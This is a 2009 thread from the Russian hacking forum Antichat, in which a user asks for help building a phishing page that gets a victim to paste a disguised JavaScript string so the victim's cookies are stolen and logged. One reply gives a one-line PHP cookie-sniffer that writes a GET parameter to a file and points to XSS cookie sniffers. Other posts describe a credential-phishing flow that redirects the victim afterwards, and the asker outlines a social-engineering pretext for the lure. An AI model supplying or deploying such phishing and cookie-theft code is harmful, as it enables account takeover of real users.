Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Проконсультируйте в вопросе, плз... |
07.05.2009, 14:56
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Проконсультируйте в вопросе, плз...
Сразу к вопросу:
Предположим есть пользователь, который 100% кликнет на фейковую страничку, где ему предолжено будет ввести данные. Причем данные, не что иное, как зашифрованная строка javascripta на хищение куков. Я просто плохо разбираюсь в php и javascript, но можно было сделать так, что при введении этой "ядовитой строки" в какое-либо поле, специально подготовленный скрипт считывал ее, получал куки пользователя , которвый ее ввел, и соответственно где-то это фиксировалось в файле?
Надеюсь, что вопрос корректный, и смысл понятен.. Кто сможет, ответьте , пожалуйста как можно подробно. Заранее спасибо!
|
|
|
07.05.2009, 15:25
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 248
Провел на форуме:
4333655
Репутация:
452
|
|
типа Онлайн шоле?
|
|
|
|
07.05.2009, 15:45
|
|
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме:
1917742
Репутация:
541
|
|
PHP код:
<? file_put_contents('kyki.txt', $_GET[c]); ?>
а вообще гугли в сторону xss/cookie sniffer |
|
|
|
07.05.2009, 18:19
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
3477756
Репутация:
82
|
|
Если правильно понял, тебе нужно чтобы после ввода "жертвой" логина и пасса(к примеру) в форму они сохранялись в файле!!!???
Если так, тогда именно этим 99% фейковых страничек и занимаются...
|
|
|
|
08.05.2009, 00:30
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
LEE_ROY, а что конкретно значит эта строка кода? Получает куки?
Если правильно понял, тебе нужно чтобы после ввода "жертвой" логина и пасса(к примеру) в форму они сохранялись в файле!!!???
Если так, тогда именно этим 99% фейковых страничек и занимаются...
Это верно все, но хотелось бы немного усоврешенстовать что ли... Согласитесь, что совсем невнимательные и глупенькие будут вводить логин и пароль на не известной странице. Поэтому я предлагаю зашифровать строку "javascript.document("cookie")" ( как то так) известной функцией в что-нибудь непонятное , скажем "dsd243sdfdfd23453454sdf" и выдать юзеру эту зашифрованную строку как за пасс, при этом скрипт получит ее, разшифрует (заметьте это не хэш! а просто известная простая функция), затем обработает и запишет печеньки в файл.
Получится , думаете такое сделать?! |
|
|
|
08.05.2009, 00:35
|
|
Познающий
Регистрация: 14.12.2007
Сообщений: 79
Провел на форуме:
329826
Репутация:
75
|
|
Тебе зачем так всё усложнять??
Зашло мясо на фейк, ввело данные - данные улетели к тебе; мясо редиректнуло на нормальную страницу и все. Ты получаешь акк, мясо - заходит к себе. К чему шифрование какое-то???
|
|
|
|
08.05.2009, 01:08
|
|
Участник форума
Регистрация: 04.04.2009
Сообщений: 256
Провел на форуме:
3165677
Репутация:
350
|
|
Я согласен зачем же еще шифровать и усложнять себе жизнь мясо оно и есть мясо а умный человек и так поймет шо перед ним лажа и не полезет!
|
|
|
|
08.05.2009, 01:15
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Сообщение от 4adr0s
Тебе зачем так всё усложнять??
Зашло мясо на фейк, ввело данные - данные улетели к тебе; мясо редиректнуло на нормальную страницу и все. Ты получаешь акк, мясо - заходит к себе. К чему шифрование какое-то???
Мясо  Мда....
Ну а усложнять понятно зачем, чтобы завоевать доверие у пользователя. Хотите сказать, что многие увидев фейковую ссылку сразу на нее клацают, и удивленно видя поля для ввода логина и пароля , вводят их?! Таких же не все, как Вы выражаетесь мясо. Даже девушки в этом разбираются, с бытсротой определяют где подвох.
А тут есть вероятность, что пользователь поверит. Ну смотрите сами, куда результативней сначала познакомится с жертвой выяснить ее интересы , затем дать ссылку при этом добавить, что-то вроде:
"Вот здесь, кстати тоже можно найти. Можешь под моим логином и паролем зайти, я тебе верю" И давать при этом логин: Vasya , а пароль: dfsdjhf232hfjh323f (зашифр строка для куков) . Держу пари, все равно попадется! 
Ну ладно, зачем просвешать, может кто-нибудь просто подсказать как реализовывать, чисто на словах. Не заставляю писать за меня. Просто я не очень понимаю, в результате каких действий от пользователя скрипт получает куки? какой командой, и как их в файл сохранить. На сколько я понял LEE_ROY, пример твоей строки, ничего не делает кроме как перехвата куков?. Войдите в положение, просто я ноль в php 
Последний раз редактировалось A2GIL; 08.05.2009 в 01:17..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
